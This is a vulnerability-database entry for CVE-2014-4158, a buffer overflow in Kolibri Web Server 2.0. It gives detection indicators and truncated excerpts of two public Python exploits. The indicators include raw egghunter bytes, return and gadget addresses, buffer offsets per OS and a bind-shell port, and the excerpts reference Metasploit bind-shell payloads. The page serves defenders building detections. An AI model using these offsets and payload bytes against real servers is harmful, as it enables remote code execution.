CVE-2014-4158
published 2014-06-13CVE-2014-4158: Stack-based buffer overflow in Kolibri 2.0 allows remote attackers to execute arbitrary code via a long URI in a GET request.
PriorityP258high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
14.30%
96.2th percentile
Stack-based buffer overflow in Kolibri 2.0 allows remote attackers to execute arbitrary code via a long URI in a GET request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| senkas | kolibri | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xEB\xBA\x90\x90
bytes↗
\xC2\x15\x40
bytes↗
dogedoge
bytes↗
\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x64\x6f\x67\x65\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7
bytes↗
\x63\x46\x92\x7c
bytes↗
\x83\xc4\x44\x83\xc4\x44\x83\xc4\x44\xff\xe4
- →Exploit sends a GET request with an oversized URI (buffer of 792–794+ bytes of NOP sleds, egghunter, and shellcode) to trigger the stack-based buffer overflow in Kolibri 2.0. ↗
- →The SEH-based exploit (exploit 34059) places the egghunter tag 'doge' (\x64\x6f\x67\x65) in the Host header alongside the shellcode; detect HTTP requests where the Host header contains binary/shellcode content. ↗
- →The classic stack overflow exploit (exploit 33027) uses a call-ESP gadget at 0x7C924663 (kernel32/ntdll on XP SP3 Spanish); the EIP overwrite value \x63\x46\x92\x7c is a reliable detection artifact in the GET URI payload. ↗
- →The SEH overwrite exploit (exploit 34059) uses a pop/pop/ret gadget at 0x4015C2 inside kolibri.exe itself; presence of \xC2\x15\x40 in the GET URI is a strong indicator of exploitation. ↗
- →Monitor HTTP traffic to Kolibri 2.0 for GET requests with URI lengths exceeding 515 bytes, which is the approximate overflow threshold used in both exploits. ↗
- →The bind-shell payload in exploit 34059 opens TCP port 5698 on the victim; monitor for unexpected listening services on that port after exploitation. ↗
- ·The SEH exploit (34059) targets specific offsets per OS: 792 bytes for Windows XP SP2/Server 2003, 794 bytes for Windows 7 SP1; the pop/pop/ret gadget (0x4015C2) is from kolibri.exe itself and is version-specific. ↗
- ·The call-ESP EIP gadget 0x7C924663 used in exploit 33027 is specific to Windows XP SP3 Spanish; the gadget address will differ on other OS versions/languages. ↗
- ·The alpha-mixed encoded shellcode in exploit 34059 is designed to avoid bad characters; the egghunter tag 'doge' (\x64\x6f\x67\x65) must appear twice consecutively in memory for the hunter to locate the shellcode. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Kolibri Web Server 2.0 - GET (SEH)
exploitdb·2014-07-14
CVE-2014-4158 Kolibri Web Server 2.0 - GET (SEH)
Kolibri Web Server 2.0 - GET (SEH)
---
#!/usr/bin/python
# Exploit Title : Kolibri WebServer 2.0 Get Request SEH Exploit
# Exploit Author : Revin Hadi S
# Date : 14/07/2014
# Vendor : http://www.senkas.com
# Version : 2.0
# Tested on : Windows XP SP2 Eng, Windows Server 2003 Eng, Win 7 SP1 Eng
import socket, sys
help = """Kolibri WebServer 2.0 Get Request SEH Exploit
Target
[1]Windows XP SP2 Eng & Windows 2003 SP2 Eng
[2]Windows 7 SP1 Eng
Usage : %s [rhost] [port] [target]""" %sys.argv[0]
try:
script, rhost, port, target = sys.argv
except ValueError:
print help
exit()
try:
port = int(port)
target = int(target)
except ValueError:
print "Port & Target should number !"
exit()
#msfpayload windows/shell_bind_tcp LPORT=5698 R | msfencode -a x86 -e x86/alpha_mixed -t c
shellcode = ("\x89\
Exploit-DB
Kolibri Web Server 2.0 - GET Stack Buffer Overflow
exploitdb·2014-04-25
CVE-2014-4158 Kolibri Web Server 2.0 - GET Stack Buffer Overflow
Kolibri Web Server 2.0 - GET Stack Buffer Overflow
---
#!/usr/bin/python
# Exploit Title: Kolibri GET request Stack buffer Overflow
# Date: 25 April 2014
# Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org
# Vendor Homepage: http://www.senkas.com/kolibri/download.php
# Version: Kolibri 2.0
# Tested on: Windows XP SP3, Spanish
# Thanks:To my wife for putting up with my possessions
# Description:
# A buffer overflow is triggered when a long GET command is sent to the server.
import socket, sys, os, time
if len(sys.argv) != 3:
print "[*] Uso: %s \n" % sys.argv[0]
print "[*] Exploit created by Polunchis"
print "[*] https://www.intrusionlabs.com.mx"
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
#./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -t c -
No writeups or analysis indexed.
http://osvdb.org/show/osvdb/108090http://osvdb.org/show/osvdb/70808http://packetstormsecurity.com/files/126332/Kolibri-2.0-Stack-Buffer-Overflow.htmlhttp://www.exploit-db.com/exploits/33027http://www.exploit-db.com/exploits/34059http://www.securityfocus.com/bid/68195http://osvdb.org/show/osvdb/108090http://osvdb.org/show/osvdb/70808http://packetstormsecurity.com/files/126332/Kolibri-2.0-Stack-Buffer-Overflow.htmlhttp://www.exploit-db.com/exploits/33027http://www.exploit-db.com/exploits/34059http://www.securityfocus.com/bid/68195
2014-06-13
Published